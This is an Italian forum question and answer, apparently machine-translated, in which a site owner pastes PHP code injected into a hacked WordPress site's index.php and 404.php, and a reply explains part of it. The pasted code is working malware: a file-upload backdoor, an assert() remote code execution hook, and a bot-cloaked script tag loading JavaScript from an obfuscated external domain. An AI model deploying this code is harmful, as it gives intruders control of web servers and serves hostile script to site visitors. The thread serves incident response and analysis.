Il mio sito è stato violato e ha iniettato il codice su index.php e 404.php [duplicato]

Naviga le tue risposte
0

Ecco il codice iniettato su index.php 

if(@isset($_GET[bots])){
    echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">';
    echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
    if($_POST['golden']=="Done"){
        if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){
            echo'+';
        }else{
            echo'-';
        }
    }
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
else exit;

ed ecco il codice iniettato su 404.php: 

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0);
@ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
    @ini_set('upload_max_filesize','1000000');
    $size=$_POST['size'];
    $open_image=$_FILES['img']['name'];
    $open_image_tmp=$_FILES['img']['tmp_name']; 
    $image_tmp=$size.$open_image;
    @move_uploaded_file($open_image_tmp,$image_tmp);
    echo "<!-- 404-NOT-FOUND-IMG -->";
} else echo "<!-- 404-NOT-FOUND-ERROR -->";
$http_report_user = $_SERVER['HTTP_USER_AGENT'];
if ( @stripos ( $http_report_user, 'bot' ) == false and @stripos ( $http_report_user, 'google' ) == false and @stripos ( $http_report_user, 'yandex' ) == false and @stripos ( $http_report_user, 'slurp' ) == false and @stripos ( $http_report_user, 'yahoo' ) == false and @stripos ( $http_report_user, 'msn' ) == false and @stripos ( $http_report_user, 'bing' ) == false ) {
    $http_report = strtolower ( $_SERVER['HTTP_HOST'] );
    $wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
    $not_found_report = strrev ('=drowyek&');
    $not_found_page=str_ireplace('/','',$_SERVER['REQUEST_URI']);
    $not_found_page=str_ireplace('-',' ',$not_found_page);
    echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';
}?>

Per favore aiutami a trovare dove è iniziato o la backdoor usata per iniettare un tale codice dannoso. Inoltre, qualcuno può dirmi cosa fa quel codice?

    
posta Romeo M 08.08.2018 - 11:24
fonte

1 risposta

0

Lì c'è molta confusione, ma queste due righe si distinguono: 

$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');

Sembra che stiano cercando di estrarre uno script da quel sito (saggi-oggi). Presumibilmente, è un dominio compromesso che hanno trovato e sfruttato e stanno includendo quel codice nel tuo sito per propagarsi. 

echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';

Questa linea prende la stringa formata in PHP e la stampa come HTML. Nota come sta procedendo: le variabili vengono tutte inserite nei tag all'interno di <script> , quindi sta caricando quella stringa composta come posizione per alcuni Javascript. Quindi eseguirà quel Javascript esterno sul tuo sito.

Hai recentemente installato nuovi plugin in Wordpress? Ce ne sono diversi con noti problemi di sicurezza. Potrebbe valere la pena di installare un plug-in di controllo 404. Tutte le richieste ricevute dal tuo sito che non collegano da nessuna parte verranno visualizzate, quindi verranno visualizzate tutte le richieste relative a plug-in non protetti, insieme alla posizione da cui provengono le richieste. Potrebbe non triage la situazione, ma sarà una buona indicazione su come e da dove vieni attaccato.

    
risposta data 08.08.2018 - 13:51
fonte

Leggi altre domande sui tag

Utilizzo di virgolette singole o doppie per impedire XSS e SQLi? Possibili attacchi di interfaccia fisica di BMC su un server